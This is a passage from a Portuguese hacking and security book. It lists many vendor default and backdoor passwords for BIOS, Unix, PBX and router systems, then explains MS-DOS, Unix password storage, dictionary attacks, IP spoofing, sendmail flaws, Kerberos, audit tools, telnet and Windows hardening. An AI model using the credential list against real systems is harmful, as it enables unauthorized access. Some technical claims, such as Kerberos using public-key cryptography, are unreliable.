Quantex PC BIOS Console

n/a xljlbj Admin

Raidzone

raid arrays n/a raidzone

Ramp Networks

WebRamp wradmin trancell

RapidStream

RapidStream Appliances

Multi

rsadmin (null) Admin

Raritan KVM Switches admin raritan Admin

RedHat Redhat 6.2 HTTP

piranha q User

RedHat Redhat 6.2 HTTP

piranha piranha User

Remedy Remedy Multi

ARAdmin

AR#Admin#

Admin

Terrorismo Tecnológico Aprenda Para Sobreviver

330

Research

PC BIOS Console

n/a Col2ogro2

Admin

RM RM Connect Multi

admin rmnetlm

RM RM Connect Multi

admin2 changeme

RM RM Connect Multi

adminstrator

changeme

RM RM Connect Multi

deskalt password

RM RM Connect Multi

deskman changeme

RM RM Connect Multi

desknorm

password

RM RM Connect Multi

deskres password

RM RM Connect Multi

guest (none)

RM RM Connect Multi

replicator

replicator

RM RM Connect Multi

RMUser1

password

RM RM Connect Multi

setup changeme

RM RM Connect Multi

teacher password

RM RM Connect Multi

temp1 password

RM RM Connect Multi

topicalt password

RM RM Connect Multi

topicnorm

password

RM RM Connect Multi

topicres password

RM Server BIOS Console

n/a RM

Semaphore

PICK O/S DESQUETOP

Semaphore

PICK O/S DS

Semaphore

PICK O/S DSA

Semaphore

PICK O/S PHANTOM

Shuttle PC BIOS n/a Spacve Admin

Siemens Hicom 100E PBX 31994 31994

Siemens Hicom 150E PBX 31994 31994

Siemens PhoneMail poll poll

Siemens PhoneMail poll tech

Siemens PhoneMail sysadmin

sysadmin

Siemens PhoneMail system system

Terrorismo Tecnológico Aprenda Para Sobreviver

331

Siemens PhoneMail system field

Siemens PhoneMail tech tech

Siemens ROLM PBX admin pwp

Siemens ROLM PBX eng engineer

Siemens ROLM PBX op op

Siemens ROLM PBX op operator

Siemens ROLM PBX su super

Siemens Nixdorf

PC BIOS Console

n/a SKY_FOX

Admin

Silicon Graphics

IRIX Multi

4Dgifts 4Dgifts Admin

Silicon Graphics

IRIX Multi

4Dgifts (none) Admin

Silicon Graphics

IRIX Multi

demos (none) Admin

Silicon Graphics

IRIX Multi

Ezsetup (none) Admin

Silicon Graphics

IRIX Multi

field field Admin

Silicon Graphics

IRIX 5.x, 6.x Multi

guest (none) CLI, UID guest

Silicon Graphics

IRIX 5.x, 6.x Multi

lp (none) CLI, UID lp

Silicon Graphics

IRIX Multi

OutOfBox

(none) Admin

Silicon Graphics

IRIX Multi

tour tour Admin

Silicon Graphics

IRIX Multi

tutor (none) Admin

Silicon Graphics

IRIX Multi

tutor tutor Admin

Sovereign Hill

InQuery Admin shs Admin

Sun Sun E10000 System Service Processor

Multi ssp ssp Admin

Sun SunScreen 3.1 Lite

TCP 3852

admin admin Admin

SuperMicro

PC BIOS Console

n/a ksdjfg934t

Admin

Sybase Adaptive Server Enterprise

11.x,12.x

Multi sa (none) SA and SSO

Terrorismo Tecnológico Aprenda Para Sobreviver

332

roles

Telus Telephony Services Multi (created) telus00 User

Telus Telephony Services Multi (created) telus99 User

Tiny PC BIOS Console

n/a Tiny Admin

TMC PC BIOS Console

n/a BIGO Admin

Toshiba PC BIOS Console

n/a 24Banc81

Admin

Toshiba PC BIOS Console

n/a Toshiba Admin

Toshiba PC BIOS Console

n/a toshy99 Admin

UNIX Generic Multi adm adm Admin

UNIX Generic Multi adm (none) Admin

UNIX Generic Multi admin admin User

UNIX Generic Multi administrator

administrator

User

UNIX Generic Multi administrator

(none) User

UNIX Generic Multi anon anon User

UNIX Generic Multi bbs bbs User

UNIX Generic Multi bbs (none) User

UNIX Generic Multi bin sys Admin

UNIX Generic Multi bin sys Admin

UNIX Generic Multi checkfs checkfs User

UNIX Generic Multi checkfsys

checkfsys

User

UNIX Generic Multi checksys

checksys

User

UNIX Generic Multi daemon daemon User

UNIX Generic Multi daemon (none) User

UNIX Generic Multi demo demo User

UNIX Generic Multi demo (none) User

UNIX Generic Multi demos demos User

UNIX Generic Multi demos (none) User

UNIX Generic Multi dni (none) User

UNIX Generic Multi dni dni User

UNIX Generic Multi fal (none) User

UNIX Generic Multi fal fal User

UNIX Generic Multi fax (none) User

UNIX Generic Multi fax fax User

UNIX Generic Multi ftp (none) User

UNIX Generic Multi ftp ftp User

UNIX Generic Multi games games User

Terrorismo Tecnológico Aprenda Para Sobreviver

333

UNIX Generic Multi games (none) User

UNIX Generic Multi gopher gopher User

UNIX Generic Multi gropher (none) User

UNIX Generic Multi guest guest User

UNIX Generic Multi guest guestgue

User

UNIX Generic Multi guest (none) User

UNIX Generic Multi halt halt User

UNIX Generic Multi halt (none) User

UNIX Generic Multi informix informix User

UNIX Generic Multi install install Admin

UNIX Generic Multi lp lp User

UNIX Generic Multi lp bin User

UNIX Generic Multi lp lineprin User

UNIX Generic Multi lp (none) User

UNIX Generic Multi lpadm lpadm User

UNIX Generic Multi lpadmin lpadmin User

UNIX Generic Multi lynx lynx User

UNIX Generic Multi lynx (none) User

UNIX Generic Multi mail (none) User

UNIX Generic Multi mail mail User

UNIX Generic Multi man man User

UNIX Generic Multi man (none) User

UNIX Generic Multi me (none) User

UNIX Generic Multi me me User

UNIX Generic Multi mountfs mountfs Admin

UNIX Generic Multi mountfsys

mountfsys

Admin

UNIX Generic Multi mountsys

mountsys

Admin

UNIX Generic Multi news news User

UNIX Generic Multi news (none) User

UNIX Generic Multi nobody (none) User

UNIX Generic Multi nobody nobody User

UNIX Generic Multi nuucp (none) User

UNIX Generic Multi operator operator User

UNIX Generic Multi operator (none) User

UNIX Generic Multi oracle (none) User

UNIX Generic Multi postmaster

postmast

User

UNIX Generic Multi postmaster

(none) User

Terrorismo Tecnológico Aprenda Para Sobreviver

334

UNIX Generic Multi powerdown

powerdown

User

UNIX Generic Multi rje rje User

UNIX Generic Multi root root Admin

UNIX Generic Multi root (none) Admin

UNIX Generic Multi setup setup Admin

UNIX Generic Multi shutdown

shutdown

User

UNIX Generic Multi shutdown

(none) User

UNIX Generic Multi sync sync User

UNIX Generic Multi sync (none) User

UNIX Generic Multi sys sys Admin

UNIX Generic Multi sys system Admin

UNIX Generic Multi sys bin Admin

UNIX Generic Multi sysadm sysadm Admin

UNIX Generic Multi sysadm admin Admin

UNIX Generic Multi sysadmin

sysadmin

Admin

UNIX Generic Multi sysbin sysbin Admin

UNIX Generic Multi system_admin

(none) Admin

UNIX Generic Multi system_admin

system_admin

Admin

UNIX Generic Multi trouble trouble User

UNIX Generic Multi umountfs

umountfs

User

UNIX Generic Multi umountfsys

umountfsys

User

UNIX Generic Multi umountsys

umountsys

User

UNIX Generic Multi unix unix User

UNIX Generic Multi user user User

UNIX Generic Multi uucp uucp User

UNIX Generic Multi uucpadm

uucpadm

User

UNIX Generic Multi web (none) User

UNIX Generic Multi web web User

UNIX Generic Multi webmaster

webmaster

User

UNIX Generic Multi webmaster

(none) User

UNIX Generic Multi www (none) User

UNIX Generic Multi www www User

Unknown

System 88 Console

test test User

Unknown

System 88 Console

operator operator Admin

Terrorismo Tecnológico Aprenda Para Sobreviver

335

Unknown

System 88 Console

overseer overseer Admin

Unknown

POCSAG Radio Paging

2.05 Port 8000

n/a password

Admin

Verifone Verifone Junior 2.05 (none) 166816

Vextrec Technology

PC BIOS Console

n/a Vextrex

Vobis PC BIOS Console

n/a merlin Admin

Wim Bervoets

WIMBIOSnbsp BIOS

Console

n/a Compleri Admin

WWWBoard

WWWADMIN.PL HTTP

WebAdmin

WebBoard

Admin

Xylan Omniswitch Telnet

admin switch Admin

Xylan Omniswitch Telnet

diag switch

Xyplex Routers Port 7000

n/a access User

Xyplex Routers Port 7000

n/a system Admin

Xyplex Terminal Server Port 7000

n/a access User

Xyplex Terminal Server Port 7000

n/a system Admin

Zenith PC BIOS Console

n/a 3098z Admin

Zenith PC BIOS Console

n/a Zenith Admin

ZEOS PC BIOS Console

n/a zeosx Admin

Zyxel Generic Routers Telnet

n/a 1234 Admin

17.4 Política de senhas não-crackeáveis

Como já descrito antes combine maiúscula com minúsculas e números no meio!

Terrorismo Tecnológico Aprenda Para Sobreviver

336

Capítulo XVIII Entendendo MS-DOS

Terrorismo Tecnológico Aprenda Para Sobreviver

337

18.1 MS-DOS

Por ser um dos primeiros S.O. e muito usado até hoje já que é base para outros Sistemas Operacionais, é muito valido saber um pouco de como ele funciona.

Ao ligarmos um computador o ROM-BIOS (Read Only Basic Input/Output System) começa uma bateria de testes de inicialização (POST - Power-On Self-Test) que testa todas as características funcionais do computador (RAM, teclado, vídeo, drives, etc.).

Após os testes terem sido bem sucedidos e se não forem encontrados erros ele entrega o sistema agora para o S.O. (Sistema Operacional). Geralmente ele procura primeiro no drive de disquete e caso não encontre irá procurar no disco rígido!

Encontrado ele é carregado na memória

No caso do MS-DOS assim que estiver carregado na memória ele mostrará o prompt de comando, que quer dizer que ele já está preparado e esperando a solicitação de alguma função. O prompt indica que o sistema esta esperando a linha de comando para executar a função solicitada.

18.2 Características do MS-DOS

O MS-DOS é monousuário e monoprogramado. A comunicação do usuário com o MS-DOS ocorre de dois modos, o modo interativo e o modo batch.

a) Modo Interativo: Propriedade de executar um comando no instante em que foi digitado através do prompt, que é um sinal que indica que o MS-DOS está pronto para executar seus comandos.

Terrorismo Tecnológico Aprenda Para Sobreviver

338

b) Modo batch: Também chamado de comandos em lote, ou seja, uma seqüência de comandos que serão executados na ordem em que aparecem. Os comandos desejados devem ser colocados em ordem seqüencial em um arquivo que pode ser criado por um processador de textos.

18.3 Comandos Internos

São comandos que por serem usadas com maior freqüências, são inerentes ao Sistema Operacional, sendo carregados na memória toda vez que o MS-DOS é carregado. Portanto, podem ser executados a qualquer momento e em qualquer subdiretório.

Principais Comandos Internos:

� DIR: Usado para exibir os arquivos e os subdiretórios de um diretório. Se usado sem parâmetros e opções, este exibirá o nome de volume, o número de série do disco, os diretórios, os arquivos e suas respectivas extensões, seus tamanhos, a data e a hora de criação ou alteração, o total de arquivos exibidos, seus tamanhos acumulados e o total de espaço livre em disco em bytes. Sintaxe: DIR [DRIVE:/CAMINHO][/ATRIBUTOS]

� COPY: Comando utilizado para copiar arquivos de um local para outro, utilizado para concatenar vários arquivos gerando apenas um. Sintaxe: COPY [driveorigem:][nomearq.ext] [drivedestino:]

� DEL: Remove um ou mais arquivos especificados de um diretório. A especificação pode ser de um arquivo em particular ou de um grupo de arquivos, utilizando-se os caracteres globais [*][?]. Sintaxe: DEL [drive:][nomearq.ext]

� MKDIR ou MD: Comando utilizado para criar um diretório ou para criar uma estrutura hierárquica de níveis múltiplos. Sintaxe: MD [unidade][caminho] nome diretório

Terrorismo Tecnológico Aprenda Para Sobreviver

339

� CHDIR ou CD: Comando utilizado para alterar o diretório corrente. Sintaxe: CD [caminho]

� RMDIR ou RD: Comando utilizado para remover, excluir, deletar um diretório.

Sintaxe: RD[unidade][caminho]nome diretório

18.4 Comandos Externos

São comandos usados com menor freqüência e que por isso tem que ser carregados na memória RAM toda vez que for necessária sua utilização.

Alguns Comandos Externos:

� FORMAT: Formatador de discos do MS-DOS, ou seja, estabelece marcos eletrônicos que determinam a divisão do disco em trilhas, setores e capacidade de bytes, de forma que este possa ser reconhecido pelo sistema operacional e então receber e transmitir informações.

Sintaxe: FORMAT [drive:] � DISKCOPY: Comando utilizado para fazer uma cópia idêntica

do conteúdo de um disco para outro. Sintaxe: DISKCOPY [origem][destino]

� BACKUP: Comando que permite que se realize cópias de

segurança e restaurações de um disco, diretório ou arquivo para outro disco ou diretório.

Sintaxe: MSBACKUP [arquivo de configuração] � LABEL: Comando para criar, modificar ou apagar o volume

(nome) de um disco. O volume de um disco pode ter até 11 caracteres ou nenhum.

Sintaxe: LABEL [drive:][nome do disco]

Terrorismo Tecnológico Aprenda Para Sobreviver

340

� TREE: Comando que permite visualizar o caminho dos diretórios de um disco de forma hierárquica.

Sintaxe: TREE [drive:]

18.5 Comandos de Inicialização

� CLS: Comando utilizado para limpar a tela. Sintaxe: A:\>CLS ou C:\>CLS

� TIME: Comando utilizado para verificar a hora do sistema e configurar a nova hora do mesmo. Suas informações são utilizadas para alterar o diretório sempre que criamos ou alteramos um arquivo. Sintaxe: TIME hh:mm:ss:cs a/p (am/pm)

� DATE: Comando utilizado para exibir a data do sistema e configurar a mesma.

Sintaxe: DATE mm-dd-aa � VER: Comando utilizado para exibir a versão do MS-DOS. Sintaxe: VER � TYPE: Utilizado para se exibir o conteúdo de um arquivo tipo

texto. Sintaxe: TYPE [unidade][caminho] nome arquivo

18.6 Arquivos em Lote

O S.O. permite que agrupemos uma série de comandos dentro de um arquivo de forma a serem executadas seqüencialmente todas vezes que este arquivo for chamado no Prompt. Este processo é chamado de Processamento em Lote, ou arquivo Autoexecutável ou

Terrorismo Tecnológico Aprenda Para Sobreviver

341

Batch File. Estes arquivos podem ser criados diretamente no Prompt do sistema operacional ou num editor de arquivos texto, como o EDIT. Os arquivos em lote têm em comum entre si, a sintaxe de comandos e a extensão.BAT no seu nome-de-arquivo. Pode-se criar arquivos .BAT para diversas aplicações, tais como:

- exibição de diretórios; - mudança de PATH; - cópias de segurança; - compressão de arquivos; - parametrização do sistema, etc.

O arquivo .BAT mais presente nos computadores de modo geral é o AUTOEXEC.BAT, que normalmente é utilizado para estabelecer parâmetros de utilização do sistema e do equipamento, visto que é executada, toda vez que o sistema é inicializado.

18.7 Outros

� DEFRAG: Desfragmentador de arquivos do MS-DOS.

� MSAVE: Programa antivírus que acompanha o MSDOS. O menu principal deste utilitário apresenta as seguintes opções:

a) Encontrar - Pesquisa o disco por vírus conhecidos. b) Encontrar e limpar - Pesquisa disco e remove virus conhecidos. c) Selecionar nova unidade - Seleciona unidade a ser pesquisada. d) Opções - Definem opções de pesquisa como verificar integridade (alteração no tamanho de arquivos executáveis), criar totais de controle, anti-stealth e verificar todos os arquivos.

� VSAFE: Programa residente em memória que faz uma checagem verificando atividades suspeitas que poderiam estar

Terrorismo Tecnológico Aprenda Para Sobreviver

342

sendo feitas por algum tipo de vírus. Os controles feitos pelo vsafe são:

a) Avisar quando uma formatação de baixo nível está acontecendo. b) Avisar quando algum programa residente esta sendo carregado. c) Verificar arquivos executáveis abertos pelo DOS. d) Verificar setor de boot dos discos procurando por vírus. e) Evitar que arquivos executáveis sejam regravados. f) Proteger a área de boot contra gravação.

Terrorismo Tecnológico Aprenda Para Sobreviver

343

Capítulo XIX

Unix

Terrorismo Tecnológico Aprenda Para Sobreviver

344

19.1 Autenticação Fraca

O Unix guarda as informações de todos os usuários do sistema

no arquivo /etc/passwd. Este arquivo contém o username, o nome real, informação para a identificação e informações básicas sobre a conta de cada usuário no sistema. O arquivo é organizado da seguinte forma: cada linha do arquivo contém o registro de um usuário, e os registros são divididos em campos separados pelo caracter (:).

Por exemplo:

root:fi3sED95ibqR6:0:1:System Operator:/:/bin/csh

daemon:*:1:1::/tmp: uucp:OORoMN9FyZfNE:4:4::/usr/spool/uucppublic:/usr/lib/uucp/u

ucico jsilva:eH5/.mj7NB3dx:181:100:José Silva:/u/jsilva:/bin/csh

As três primeiras contas, root, daemon e uucp, são contas do sistema e a última é conta de usuário.

Os campos de cada linha tem o seguinte significado:

jsilva username eH5/.mj7NB3dx senha do usuário cifrada 181 número identificador do usuário (UID) 100 número identificador do grupo ao qual

usuário pertence (GID)

Terrorismo Tecnológico Aprenda Para Sobreviver

345

José Silva nome real do usuário /u/jsilva/ diretório home do usuário /bin/csh shell do usuário

O objetivo da senha é de autenticar o usuário. Em muitas versões do Unix caso um usuário tente acessar um sistema e entre com a senha errada diversas vezes consecutivamente, a conta deste usuário é bloqueada. Isto evita com que uma pessoa fique tentando acertar a senha de outro, e, caso isto aconteça, deve-se avisar ao administrador que alguém está tentando quebrar uma conta.

A senha é cifrada com uma função one-way a qual cifra a senha com blocos de zero. O resultado da função crypt( ) é armazenado no arquivo /etc/passwd. Quando tentamos entrar no sistema o programa /bin/login cifra a senha digitada pelo usuário com a mesma função, e compara o resultado com o que temos armazenado no arquivo /etc/passwd, se forem iguais permite a entrada do usuário no sistema.

O algoritmo do crypt( ) usado é baseado no DES (Data Encryption Standard).

O ataque mais usado na rede é chamado de Ataque do Dicionário que foi criado por Robert Morris (coincidência ou não, filho de Robert Morris da NSA que foi um dos pesquisadores que desenvolveu crypt( ) ). O ataque consiste na cifragem das palavras de um dicionário através da função crypt( ), e comparações com os arquivos de senhas de usuários. Desta forma, quando uma palavra do dicionário cifrada coincidisse com a senha cifrada de um usuário, o atacante teria obtido uma senha.

Para dificultar este ataque foi criado o chamado salt, que é um número randômico gerado na hora em que o usuário esta inserindo ou alterando a sua senha. O número gerado pode estar entre 0 e 4095 e é cifrado juntamente com a senha, o que impede a utilização de um dicionário genérico para todos os usuários. O atacante agora

Terrorismo Tecnológico Aprenda Para Sobreviver

346

tem que cifrar cada palavra do dicionário com o salt de cada usuário.

Embora cada usuário tenha seu username, o Unix internamente representa cada usuário por um número, o UID (User Identifier). Os UIDs são números de 16 bits e geralmente os UIDs entre 0 e 9 são usados para funções do sistema. Os UIDs para os usuários começam geralmente em 20 ou 100.

O Unix guarda a relação entre username e UID no arquivo /etc/passwd, após a senha cifrada temos o UID do usuário.

O UID [GAR94] é o identificador real do usuário para o sistema operacional, o username é utilizado apenas por ser mais conveniente para os usuários. Se dois usuários possuírem o mesmo UID, o Unix os veria como um mesmo usuário, mesmo eles tendo username e senhas diferentes.

Todo o usuário do Unix pertence a um ou mais grupos, e estes grupos, como os identificadores de usuário, também possuem identificador de grupo, o GID (Group Identifier). O administrador do sistema cria os grupos e especifica quais arquivos, diretórios ou dispositivos os usuários deste grupo vão ter acesso. No /etc/passwd é armazenado o GID do grupo primário do usuário. Os dados do grupo são armazenados no arquivo /etc/group.

19.2 IP Spoofing

O IP spoofing consiste na troca do IP original por um outro,

podendo assim se passar por um outro host.

Através de IP Spoofing um intruso pode se aproveitar de hosts confiáveis armazenados no arquivo.rhosts, e entrar em máquinas via rlogin, por exemplo, onde não é exigido senha.

Terrorismo Tecnológico Aprenda Para Sobreviver

347

O famoso ataque de Kevin Mitnick à rede particular de Tsutomo Shimomura, um especialista em segurança de sistemas, em dezembro de 1994, foi baseado no ataque descrito acima. Mitnick, além da rede de Shimomura, através de um modem e celular, invadiu diversos outros sistemas, como universidades, empresas e órgãos públicos.

Existe também o chamado Host Name Spoofing, mais fácil de implementar que o IP Spoofing, que é quando um DNS retorna um nome falso para um dado IP. Pode ser utilizado para atacar alguns sistemas que possuem serviços baseados em autenticação pelo nome do host.

19.3 FTP (File Transfer Protocol)

O serviço FTP permite que usuários transfiram arquivos

facilmente de um sistema para outro, através da rede.

O FTP apresenta o mesmo problema de segurança do telnet, trafegar username e senha pela rede sem nenhuma proteção.

O FTP pode ser configurado para trabalhar também com acesso anônimo, ou seja, qualquer pessoa, mesmo que não tenha conta naquela máquina pode depositar e copiar arquivos dela. O FTP anônimo é muito utilizado para a distribuição de documentos e softwares através da rede. Deve ser tomado muito cuidado na configuração de um servidor de FTP anônimo para que o acesso seja restrito aos arquivos determinados incluindo restrições de acesso. Outra atenção é que o servidor de FTP não fique sendo depósito de documentos indesejados como arquivos de intrusos, etc, por este motivo é aconselhável criar um diretório separado para a colocação de arquivos com espaço limitado.

Através do arquivo /etc/ftpusers eu posso impedir que os usuários especificados utilizem o serviço FTP.

Terrorismo Tecnológico Aprenda Para Sobreviver

348

19.4 MAIL

Através do protocolo SMTP (Simple Mail Transfer Protocol)

qualquer usuário envia uma mensagem de uma máquina para outra através da rede. O mail é o serviço mais difundida da Internet.

O sendmail, uma das implementações mais difundidas do SMTP, atua tanto como servidor como cliente.

O sendmail já é conhecido como fonte de problemas de segurança. Uma das vulnerabilidades do sendmail [GAL96] envolve em fazer o servidor executar o corpo de uma mensagem como uma shell script. O script pode fazer qualquer coisa que um usuário comum do sistema possa fazer, incluindo enviar o arquivo de senhas do sistema para o atacante. O sendmail praticamente não possui validação dos dados e permite também que seja enviado um mail par um arquivo.

O sendmail possui algumas contas que devem ser desabilitadas pelo administrador do sistema como, por exemplo, as contas “wizard”, “kill”, “debug”. A configuração do sendmail fica no arquivo /usr/lib/sendmail.cf.

O verme da Internet de 1988 utilizou-se do modo de depuração do sendmail para obter acesso irrestrito ao sistema invadido. O sendmail possui este modo de depuração, o que faz com que depois de instalado o sendmail deve ser recompilado com o modo de depuração desligado.

Como visto, o sendmail é o serviço mais fraco em nível de segurança e um dos mais utilizados.

Terrorismo Tecnológico Aprenda Para Sobreviver

349

19.5 Enteda mais sobre o kerberus

O Kerberos é uma implementação de um KDC, desenvolvida no MIT (Massachusetts Institute of Technology) utilizando o conceito de algoritmo de chave pública.

O Kerberos é um protocolo de autenticação projetado para Unix e redes TCP/IP. Um serviço Kerberos situado na rede atua com um árbitro. Kerberos provê autenticação segura na rede permitindo com que uma pessoa acesse diferentes máquinas na rede. O Kerberos é baseado em criptografia de chave única (foi implementado com o DES, mas outros algoritmos também podem ser usados).

No modelo Kerberos temos duas entidades na rede: o cliente e o servidor. Os clientes podem ser usuários ou software independente que precisam fazer download em arquivos, enviar mensagens, acessar bancos de dados, etc.

O Kerberos mantém uma base de dados com as chaves de seus clientes. No caso dos clientes serem usuários as chaves secretas pode ser uma senha cifrada. Serviços de rede que requerem autenticação, bem como os clientes que usem estes serviços registram suas chaves secretas com o Kerberos.

Sabendo a chave secreta de todos, o Kerberos pode criar mensagens que convençam uma entidade da identidade de outra.

Como o Kerberos trabalha:

Um cliente requisita um ticket para um Ticket-Granting Service (ticket TGS) para o serviço Kerberos. Este ticket é enviado para o cliente cifrado com a chave secreta deste cliente. Para usar um serviço particular, o cliente requisita um ticket para aquele serviço para o Ticket-Granting Server (TGS). Assumindo que tudo está em ordem, o TGS envia o ticket de volta ao cliente. O cliente apresenta o ticket para o servidor como um autenticador. Novamente, se não

Terrorismo Tecnológico Aprenda Para Sobreviver

350

há nada errado com as credenciais do cliente, o servidor deixa o cliente ter acesso ao serviço.

19.6 Criptografia UNIX

O algoritmo mais conhecido de chave única é o DES e o de chave pública e privada é o RSA.

19.7 Protocolos interessates

19.7.1 PGP

O PGP (Pretty Good Privacy), destina-se a comunicação segura via e-mail, para isto utiliza-se de criptografia de chave pública.

A mensagem enviada é criptografada com a chave pública do destinatário. Para que o usuário possa decifrar a mensagem ele decifra com a sua chave secreta a qual somente ele possui. Desta forma, qualquer pessoa que intercepte esta comunicação não conseguirá decifrar a mensagem.

No PGP temos também a facilidade de poder assinar uma mensagem, assim a mensagem vai cifrada com a chave secreta do remetente e o destinatário decifra com a chave pública do remetente. Uma mensagem pode ir cifrada e assinada.

19.7.2 SSL

Terrorismo Tecnológico Aprenda Para Sobreviver

351

O SSL (Secure Socket Layer) foi desenvolvido pela Netscape Communications com o objetivo de gerar segurança e privacidade entre duas aplicações. Com o SSL é possível que aplicações cliente/servidor se comuniquem de forma segura evitando influências externas, falsificação dos dados e “escuta” dos dados em claro.

O protocolo SSL atua entre o nível de aplicação e transporte da arquitetura Internet. Possui duas camadas: “SSL Record Protocol”, que é responsável por encapsular outros protocolos de alto nível e a “SSL Handshake Protocol”, que recebe os dados a serem cifrados/decifrados.

Esta segunda camada é responsável pela autenticação do cliente e/ou servidor, negociação do algoritmo criptográfico e suas chaves antes da aplicação receber ou enviar qualquer byte de dados.

Este protocolo é utilizado pelo BradescoNet para permitir homebanking.

19.8 Ferramentas para Verificação de Segurança no Unix

19.8.1 SATAN

Satan (Security Analysis Tool for Auditing Network) é o mais complexo sistema de auditoria para sistemas Unix disponível. Ele coleta a maior quantidade possível de informações sobre um host, examina os serviços de rede como o finger, o NFS, o NIS, o ftp e o tftp, rexd entre outros.

As informações que são relatadas pelo SATAN incluem tanto os tipos de serviços disponibilizados pelo host, quantos furos potenciais

Terrorismo Tecnológico Aprenda Para Sobreviver

352

nestes serviços. Estes furos geralmente são causados por erros de configuração ou bugs conhecidos dos diversos daemons. Além disto, ele pode não apenas analisar diversos hosts individualmente, mas também procurar furos baseados em Trusted Hosts, e este sim ter problemas de segurança [DAN96]. O SATAN pode também ser utilizado para verificar a topologia de uma rede, serviços oferecidos, tipos de hardware e software, etc.

19.8.2 TIGER

Muito parecido com o SATAN, o TIGER, é um conjunto de Bourne Shell (bash) scripts, programas em C e arquivos de dados que visam fazer uma auditoria de segurança num sistema Unix.

Sua maior diferença em relação ao SATAN está no fato de que a ênfase do TIGER esta em erros de permissões de arquivos, e não na área de serviços de rede, que é o caso do SATAN.

Basicamente, quando é executado, TIGER procura por um arquivo de configuração (geralmente.tigerrc) que irá limitar ou ampliar a quantidade de testes executados dependendo do desejo do usuário. Ele então irá executar uma série de scripts e retornará as falhas de segurança encontradas.

O TIGER sempre tenta descobrir formas que a conta root pode ser comprometida.

Terrorismo Tecnológico Aprenda Para Sobreviver

353

19.9 Telnet & Unix TELNET (Protocolo de Terminal Virtual) é um protocolo Internet

para estabelecer a conexão entre computadores e através dessa conexão remota pode-se executar qualquer comando ou até um programa em outra máquina, isto funciona tudo remotamente como se o teclado de seu computador estivesse ligado na CPU da outra máquina.

A interface para trabalhar é primitiva como a do dos sendo que a operação do computador remoto se dá da mesma forma, ou seja, através de uma linha de comandos UNIX.

Este programinha (telnet) já esta instalado na sua máquina, acontece que ele já vem instalado no Sistema Operacional.

O Telnet pode ser usado para a pesquisa de informações e transferência de arquivos desde que o computador ao qual você está conectado permitir que você faça essas funções.

Na verdade o Telnet foi desenvolvido para que operadores de sistemas (Sysop's) pudessem fazer algum tipo de manutenção em algum sistema, como em uma empresa ou servidor, assim que aparece algum erro ou problema o administrador remotamente através do telnet pode corrigir estes erros e colocar o Sistema para funcionar.

Programas para Telnet:

Para fazer uma conexão via Telnet, é necessário um programa específico. O windows 95 já vem com um, procure no diretório c:\windows o programa telnet.exe.

Conectando-se via Telnet Os passos que apresentamos aqui são

para o programa que acompanha a partir do Windows 95, mas são idênticos ou mudam mínimas coisas para os posteriores.

Terrorismo Tecnológico Aprenda Para Sobreviver

354

Inicie o programa Telnet.exe. Clique no menu "Conecta" (connect), selecione"Sistema Remoto" (remote system) e digite na caixa "Nome do Host" (Host Name) o endereço ao qual você quer se conectar.

Nas caixas "Porta" (port) e "Tipo do Terminal" (terminal type) selecione "telnet" e "vt100", respectivamente (isso não é um padrão, mas é usual; pode ser que em alguns lugares você tenha que mudar essa configuração). Feito isto, clique no botão "Conectar" (Connect). Isto iniciará a conexão com o computadorremoto.

Ao se completar a conexão, o sistema remoto pedirá uma senha. A qual ou você deverá saber ou descobrir.

Agora isto abrirá as portas do computador remoto. Na tela surge uma série de opções, precedidas de um número ou letra.

Para executar um desses comandos, digite esse número ou letra e tecle enter agora é só explorar e ao terminar a conexão, volte ao menu "Conecta" e selecione "Desconectar".

Endereços para conexão:

netfind.if.usp.br - Busca mundial de usuários na Internet.

Digite netfind ao estabelecer a conexão.

ned.ipac.caltech.edu - Banco de dados Extragalático da NASA/IPAC.

Digite ned ao estabelecer a conexão..

spacelink.msfc.nasa.gov - Banco de dados da NASA. Digite guest ao estabelecer a conexão.

stis.nsf.gov : Informações científicas e tecnológicas. Digite public ao estabelecer a conexão.

Terrorismo Tecnológico Aprenda Para Sobreviver

355

Comandos básicos de Unix

Os servidores não permitem acesso público via Telnet, porque essa é a principal porta de entrada de qualquer invasor.

Para impedir não se encontram menus que facilitam a navegação pelo site ou operações de qualquer tipo, o que leva a necessidade de se conhecer os comandos para poder navegar.

Como os:

ls -l lista os arquivos de um diretório

ls -al lista todos os arquivos de um diretório, mesmo os Hidden

cp x y copia o arquivo do diretório x para o diretório y (o caminho de

diretório deve ser colocado por inteiro)

mv x y move o arquivo do diretório x para o diretório y (o caminho de

diretório deve ser colocado por inteiro)

rm x deleta o arquivo x

cd xxx muda o diretório ativo para xxx

cd .. muda o diretório ativo para o que está 'acima' do atual

mkdir xxx cria o diretório xxx dentro do diretório atual

rm xxx remove o diretório xxx

Terrorismo Tecnológico Aprenda Para Sobreviver

356

Capítulo XX Sistemas - Com este guia passo a passo, vamos melhorar os principais sistemas que são instalados em servidores e desktops,

Terrorismo Tecnológico Aprenda Para Sobreviver

357

Vamos melhorar nossos sistemas! Siga as seguintes etapas conforme o sistema instalado em seus servidores ou desktops.

20.1 Desktops com Windows XP

1. Familiarize-se com este guia sobre como obter segurança e

manter-se seguro e estas práticas recomendadas para

segurança da empresa

(http://www.microsoft.com/technet/security/bestprac/bpentsec.

asp)

2. Compreenda os novos recursos de segurança do Windows

XP Professional

(http://microsoft.com/technet/prodtechnol/winxppro/evaluate/x

psec.asp)

3. Mantenha seu sistema atualizado automaticamente com a

atualização automática do Windows ativada por padrão no

Windows XP ou, como alternativa, verifique com freqüência o

serviço do Windows Update

o Para administradores de sistema, o Catálogo do

Windows Update

(http://v4.windowsupdate.microsoft.com/en/default.asp)

permite selecionar as atualizações que precisam de

download e obter uma versão que pode ser distribuída

pela empresa.

Terrorismo Tecnológico Aprenda Para Sobreviver

358

4. Consulte as seções Security

(http://microsoft.com/technet/prodtechnol/winxppro/reskit/prpt_

pt3_ptnz.asp) e Networking

(http://microsoft.com/technet/prodtechnol/winxppro/reskit/prpt_

pt4_rrqd.asp) do Windows XP Resource Kit para configurar

seu firewall e o compartilhamento

(http://www.microsoft.com/TechNet/prodtechnol/winxppro/prod

docs/Share_conn_overvw.asp) da conexão com a Internet.

5. Mantenha-se em dia com os hotfixes de segurança mais

recentes usando Security Bulletins Search

6. Atualize as ferramentas antivírus e os arquivos de assinatura

de vírus. Verifique regularmente os alertas de vírus

(http://www.microsoft.com/technet/security/virus/virus.asp).

20.2 Desktops com Windows 2000

1. Familiarize-se com este guia sobre como obter segurança e

manter-se seguro

(http://microsoft.com/security/articles/steps_default.asp) e

estas práticas recomendadas para segurança da empresa

(http://www.microsoft.com/technet/security/bestprac/bpentsec.

asp)

2. Verifique com freqüência o serviço Windows Update

(http://windowsupdate.microsoft.com/). Como alternativa para

